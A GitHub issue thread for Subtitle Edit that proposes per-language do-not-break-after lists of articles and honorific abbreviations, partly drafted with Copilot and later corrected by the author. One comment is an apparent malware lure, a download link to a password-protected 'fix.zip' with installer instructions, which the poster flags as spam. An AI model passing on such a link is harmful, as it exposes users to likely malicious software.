### ISSUE TITLE
Suggestions for additions to the do-not-break-after lists

### ISSUE THREAD

**Issue by oep42** [SubtitleEdit/subtitleedit#8764]
I suggest to add articles like "the" and "a" to the do-not-break-after lists.

**Do-not-break-after lists with articles**

I asked Copilot for lists of articles such as "the" and "a". Afterwards, I used other online sources to check and refine these lists. I cannot guarantee that all the lists are error-free, as I am not a polyglot, but they should be fairly accurate. Of course, these lists only include languages that have articles like "the" and "a". If articles have inflections, these inflections are included in the list. Only articles that are separate words, are included. Including articles in a do-not-break-after list works particularly well if those articles are short. 

There are two ways to add articles to the do-not-break-after lists of Subtitle Edit: either by adding them to existing lists, or by creating a separate category of "article do-not-break-after lists" that can be enabled independently.

These are the do-not-break-after lists with articles:

```
Danish (Dansk): den, det, en, ene, enen, et, etene, etet
Dutch (Nederlands): de, een, het, 'n
English (English): a, an, the
French (Français): la, le, les, un, une
German (Deutsch): das, dem, den, der, des, die, ein, eine, einem, einen, einer, eines
Greek (Ελληνικά): η, οι, ο, το, τα, ένας, μία, ένα
Hungarian (Magyar): a, az, egy
Italian (Italiano): gli, i, il, la, le, lo, un, una, uno
Norwegian (Norsk): den, det, ei, eia, eiene, en, ene, enen, et, etene, etet
Portuguese (Português): a, as, o, os, um, uma, uns, umas
Spanish (Español): el, la, las, los, un, una, unos, unas
Swedish (Svenska): den, det, en, ena, enen, ett, etta, etten, etna
```

(Note: All Greek articles are already in the current Greek do-not-break-after list.)

(The current do-not-break-after lists are not sorted alphabetically in the user interface of Subtitle Edit. I suggest to sort them alphabetically.)

**Do-not-break-after lists with abbreviations**

While I was at it, I also asked Copilot for lists of abbreviations for do-not-break-after lists. I skipped languages that already have a long do-not-break-after list in Subtitle Edit. I used other online sources to check and refine these lists, except for languages that do not use the Latin script. Most of the time, I decided to include different variants of the same abbreviation (with or without a period, with or without a capital letter). 

These are the do-not-break-after lists with abbreviations:

```
Albanian (Shqip): Dr, Dr., Mr, Mr., Z., Znj, Znj., dr, dr., mr, mr., znj, znj.
Bosnian (Bosanski): Dr, Dr., G., Gđa, Gđa., Gdin, Gdin., Gđica, Gđica., dr, dr., gđa, gđa., gđica, gđica.
Czech (Čeština): Dr, Dr., P., Sl, Sl., Sleč, Sleč., dr, dr., sl, sl., sleč, sleč.
Danish (Dansk): Dr, Dr., Fr, Fr., Frk, Frk., Hr, Hr., dr, dr., fr, fr., frk, frk., hr, hr.
Dutch (Nederlands): Dr, Dr., Dhr, Dhr., Mevr, Mevr., Mr, Mr., Mw, Mw., dr, dr., dhr, dhr., mevr, mevr., mr, mr., mw, mw.
English (English): Dr, Dr., Mr, Mr., Mrs, Mrs., Ms, Ms., dr, dr., mr, mr., mrs, mrs., ms, ms.
Estonian (Eesti): Dr, Dr., Hr, Hr., Pr, Pr., dr, dr., hr, hr., pr, pr.
Finnish (Suomi): Dr, Dr., Hra, Hra., Nti, Nti., Rva, Rva., dr, dr., hra, hra., nti, nti., rva, rva.
French (Français): Dr, Dr., M., Mme, Mme., Mlle, Mlle., dr, dr., mme, mme., mlle, mlle.
German (Deutsch): Dr, Dr., Fr, Fr., Frl, Frl., Hr, Hr., dr, dr., fr, fr., frl, frl., hr, hr.
Hungarian (Magyar): Dr, Dr., Hgy, Hgy., Kis., Mr, Mr., dr, dr., hgy, hgy., kis., mr, mr.
Indonesian (Bahasa Indonesia): Bpk, Bpk., Dr, Dr., Ibu., Nn., bpk, bpk., dr, dr., nn.
Italian (Italiano): Dr, Dr., Sig, Sig., Sig.na, Sig.ra, dr, dr., sig, sig., sig.na, sig.ra.
Latvian (Latviešu): Dr, Dr., K., Kdz, Kdz., dr, dr., kdz, kdz.
Lithuanian (Lietuvių): Dr, Dr., P., Pn, Pn., dr, dr., pn.
Macedonian (Македонски): Д-р, Д-р., Г-ѓа, Г-ѓа., Г-дин, Г-дин., д-р, д-р., г-ѓа, г-ѓа., г-дин, г-дин.
Norwegian (Norsk): Dr, Dr., Fr, Fr., Frk, Frk., Fru, Fru., Hr, Hr., dr, dr., fr, fr., frk, frk., fru, fru., hr, hr.
Polish (Polski): Dr, Dr., P., Pn, Pn., dr, dr., pn.
Romanian (Română): Dl, Dl., Dna, Dna., Dr, Dr., Dșo, Dșo., dl, dl., dna, dna., dr, dr., dșo, dșo.
Russian (Русский): Д-р, Д-р., Др, Г-н, Г-н., Г-жа, Г-жа., Г-ца, д-р, д-р., др, г-н, г-н., г-жа, г-жа., г-ца.
Slovak (Slovenčina): Dr, Dr., P., Sl, Sl., Sleč, Sleč., dr, dr., sl, sl., sleč, sleč.
Slovene (Slovenščina): Dr, Dr., G., Ga, Ga., Gdč, Gdč., dr, dr., ga, ga., gdč, gdč.
Spanish (Español): Dr, Dr., Sr, Sr., Sra, Sra., Srta, Srta., dr, dr., sr, sr., sra, sra., srta, srta.
Swedish (Svenska): Dr, Dr., Fr, Fr., Frk, Frk., Fru, Fru., Hr, Hr., dr, dr., fr, fr., frk, frk., fru, fru., hr, hr.
Turkish (Türkçe): B., By, By., Dr, Dr., Hn, Hn., by, by., dr, dr., hn, hn.
Ukrainian (Українська): Д-р, Д-р., П, П., Пн, П-ня., д-р, д-р., п, п., п-ня, п-ня.
Vietnamese (Tiếng Việt): Dr, Dr., dr, dr.
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oep42** [comment]
The comment by swaggy111 seems to be spam, because it was posted at the same time as (or a few seconds after) I posted my comment. Please remove the comment by swaggy111. After that, please remove this comment.

**Comment by niksedk** [comment]
Cool, should I add this or do you want to make a PR?

I actually added a lot more words to the "do-not-merge-after-list" in the beginning, but got a lot of complaints regarding lines not breaking evenly... and now it's customizable 
So a small lists, like you made, seems to be the best/medium solution.

**Comment by oep42** [comment]
I had another look today at the do-not-break-after lists with abbreviations, and found these errors. Sorry about that.

- In the Bosnian list, these two items are missing: "gdin" and "gdin."
- The last item in the Italian list should be without a period at the end, so it should be "sig.ra".
- In the Lithuanian list, this item is missing: "pn" (without period).
- In the Polish list, this item is missing: "pn" (without period).

These are the corrected lists:

```
Bosnian (Bosanski): Dr, Dr., G., Gđa, Gđa., Gdin, Gdin., Gđica, Gđica., dr, dr., gđa, gđa., gdin, gdin., gđica, gđica.
Italian (Italiano): Dr, Dr., Sig, Sig., Sig.na, Sig.ra, dr, dr., sig, sig., sig.na, sig.ra
Lithuanian (Lietuvių): Dr, Dr., P., Pn, Pn., dr, dr., pn, pn.
Polish (Polski): Dr, Dr., P., Pn, Pn., dr, dr., pn, pn.
```
